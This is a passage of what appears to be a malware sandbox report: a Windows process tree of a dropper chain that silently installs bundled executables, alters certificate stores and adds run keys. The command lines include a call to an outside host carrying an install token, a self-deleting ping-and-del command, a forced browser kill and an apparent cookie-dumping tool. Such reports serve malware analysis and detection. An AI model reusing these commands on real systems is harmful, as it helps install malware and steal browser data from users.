                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\2mrzm32onap\IBInstaller_97039.exe
                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\2mrzm32onap\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
                                                                                                                                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                            PID:5316
                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-5N794.tmp\IBInstaller_97039.tmp
                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-5N794.tmp\IBInstaller_97039.tmp" /SL5="$B03E0,9979514,721408,C:\Users\Admin\AppData\Local\Temp\2mrzm32onap\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
                                                                                                                                                                                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:5380
                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-4N1RS.tmp\{app}\vdi_compiler.exe
                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-4N1RS.tmp\{app}\vdi_compiler"
                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:5560
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                    "cmd.exe" /c start http://leatherclothesone.xyz/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039
                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                    • Checks computer location settings
                                                                                                                                                                                                                                                                                                                                                                                    PID:5524
                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\34s3ewrvdwg\app.exe
                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\34s3ewrvdwg\app.exe" /8-23
                                                                                                                                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                PID:5444
                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\34s3ewrvdwg\app.exe
                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\34s3ewrvdwg\app.exe" /8-23
                                                                                                                                                                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:1700
                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\f30xw4yas4w\pnjgjd0xmnw.exe
                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\f30xw4yas4w\pnjgjd0xmnw.exe" /quiet SILENT=1 AF=756
                                                                                                                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                  • Enumerates connected drives
                                                                                                                                                                                                                                                                                                                                                                                  • Modifies system certificate store
                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                                                                                                                  PID:5536
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\f30xw4yas4w\pnjgjd0xmnw.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\f30xw4yas4w\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617773647 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"
                                                                                                                                                                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:5708
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\xzupvtpx1jy\vpn.exe
                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\xzupvtpx1jy\vpn.exe" /silent /subid=482
                                                                                                                                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                    PID:5548
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-2FM13.tmp\vpn.tmp
                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-2FM13.tmp\vpn.tmp" /SL5="$104E4,15170975,270336,C:\Users\Admin\AppData\Local\Temp\xzupvtpx1jy\vpn.exe" /silent /subid=482
                                                                                                                                                                                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                                                                                                      • Modifies system certificate store
                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                      PID:5652
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:5360
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                                                                                                                                                                                                                                                                            tapinstall.exe remove tap0901
                                                                                                                                                                                                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                            PID:5252
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:4368
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                                                                                                                                                                                                                                                                              tapinstall.exe install OemVista.inf tap0901
                                                                                                                                                                                                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:5140
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                                                                                                                                                                                                              "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:7292
                                                                                                                                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                                                                                                                                                                                                                "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                  PID:6676
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\3irhhirvcn0\setup_10.2_us3.exe
                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\3irhhirvcn0\setup_10.2_us3.exe" /silent
                                                                                                                                                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:8516
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\DZVAOABUE6\setups.exe
                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\DZVAOABUE6\setups.exe" ll
                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                                                                                                                          PID:3132
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-V1PBR.tmp\setups.tmp
                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-V1PBR.tmp\setups.tmp" /SL5="$B005A,1873631,71168,C:\Users\Admin\AppData\Local\Temp\DZVAOABUE6\setups.exe" ll
                                                                                                                                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                            PID:3972
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Version.exe
                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Version.exe"
                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                                                                                                                        PID:560
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\WScript.exe" "C:\Program Files\unins0000.vbs"
                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                                                                                                                          PID:3304
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
                                                                                                                                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                                                                                                                            PID:2584
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe
                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"
                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                        • Modifies system certificate store
                                                                                                                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                                        PID:3916
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                          cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:4544
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                              taskkill /f /im chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                                              PID:4616
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe
                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                          PID:4244
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe" >> NUL
                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:4948
                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                                ping 127.0.0.1
                                                                                                                                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                                                                PID:2936
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe
                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"
                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                                                            PID:1420
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe
                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"
                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                            PID:6180
                                                                                                                                                                                                                                                                                                                                                                                            • C:\ProgramData\2696534.exe
                                                                                                                                                                                                                                                                                                                                                                                              "C:\ProgramData\2696534.exe"
                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                              PID:6908
                                                                                                                                                                                                                                                                                                                                                                                            • C:\ProgramData\440358.exe
                                                                                                                                                                                                                                                                                                                                                                                              "C:\ProgramData\440358.exe"
                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                              • Adds Run key to start application
                                                                                                                                                                                                                                                                                                                                                                                              PID:6940
                                                                                                                                                                                                                                                                                                                                                                                              • C:\ProgramData\Windows Host\Windows Host.exe
                                                                                                                                                                                                                                                                                                                                                                                                "C:\ProgramData\Windows Host\Windows Host.exe"
                                                                                                                                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                PID:6812
                                                                                                                                                                                                                                                                                                                                                                                            • C:\ProgramData\6365071.exe
                                                                                                                                                                                                                                                                                                                                                                                              "C:\ProgramData\6365071.exe"
                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:7156
                                                                                                                                                                                                                                                                                                                                                                                                • C:\ProgramData\6365071.exe
                                                                                                                                                                                                                                                                                                                                                                                                  "{path}"
                                                                                                                                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:6860
                                                                                                                                                                                                                                                                                                                                                                                                • C:\ProgramData\8778410.exe
                                                                                                                                                                                                                                                                                                                                                                                                  "C:\ProgramData\8778410.exe"
                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:6216
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe
                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"
                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                  PID:5948
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                    PID:6824
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                      PID:6052
                                                                                                                                                                                                                                                                                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                                                                                                                              PID:1676
                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                                                                                                • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                                                                PID:3724
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                              • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                              PID:4428
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                              • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                                                                              PID:4504
                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TempState\Downloads\BookLot.17.2102.1pawk.exe
                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TempState\Downloads\BookLot.17.2102.1pawk.exe"
                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                  PID:9056
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /C "sc QUERY NPF | FIND /C "RUNNING""
                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                      PID:6152
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                        PID:5560
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                                                                                                                                        sc QUERY NPF
                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                          PID:7312
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\find.exe
                                                                                                                                                                                                                                                                                                                                                                                                          FIND /C "RUNNING"
                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                            PID:6464
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\explorer.exe" C:\Users\Admin\AppData\Roaming\BookLot\BookLot.exe
                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                            PID:8136
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                                        PID:5000
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                        • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                        PID:5084
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                        • Enumerates connected drives
                                                                                                                                                                                                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                                        PID:5420
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding 6B6C7E4F2CD7FC075FA905FDDE7D2914 C
                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                          PID:5836
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding 201DD6B460DB0561E947B09F284E6391
                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                          PID:5944
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                            PID:8176
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe
                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=756 -BF=default -uncf=default
                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                PID:3936
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" "--anbfs"
                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4756
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x1a8,0x1a4,0x1e8,0x1cc,0x1ec,0x7ff852089ec0,0x7ff852089ed0,0x7ff852089ee0
                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:7332
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1648,6268640720124520997,17980202738275994297,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4756_809834649" --mojo-platform-channel-handle=1708 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7576
                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
